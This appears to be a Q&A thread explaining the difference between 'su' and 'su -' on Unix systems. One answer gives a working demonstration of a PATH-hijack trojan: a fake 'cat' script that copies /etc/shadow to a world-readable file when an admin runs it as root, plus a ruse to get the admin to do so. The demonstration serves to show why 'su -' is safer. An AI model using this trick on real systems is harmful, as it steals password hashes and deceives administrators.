Why do we use su – and not just su?

I don’t understand why su - is preferred over su to login as root.

Asked By: Dharmit

||
Source

su - logs you in completely as root, whereas su makes it so you are pretending to be root.

The most obvious example of this is that ~ is root’s home directory if you use su -, but your own home directory if you use su.

Depending on your system, it may also mean differences in prompt, PATH, or history file.

So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.

On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.

Also don’t forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.

Answered By: Mikel

su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.

su just switches the user, providing a normal shell with an environment nearly the same as with the old user.

Imagine, you’re a software developer with normal user access to a machine and your ignorant admin just won’t give you root access. Let’s (hopefully) trick him.

$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0

$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"

Now, you ask your admin why you can’t cat the dummy file in your home folder, it just won’t work! 

$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!

If your admin isn’t that smart or just a bit lazy, he might come to your desk and try with his super-user powers:

$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit

Wow! Thanks, super admin!

$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy

He, he.

You maybe noticed that the corrupted $PATH variable was not reset. This wouldn’t have happened, if the admin invoked su - instead.

Answered By: wag

I use su — when I’m in a directory as a regular user but want to switch to root and remain in same directory after the switch. When you use su – it switches the user to root and also takes you to /root which is the root home directory.

Answered By: Calvin Dike

The main difference is :

su - username sets up the shell environment as if it were a clean login as the specified user, it access and use specified users environment variables,

su username just starts a shell with current environment settings for the specified user.

If username is not specified with su and su -, the root account is implied as default.

Answered By: Akhil MK
Categories: Answers Tags: , , ,
Answers are sorted by their score. The answer accepted by the question owner as the best is marked with
at the top-right corner.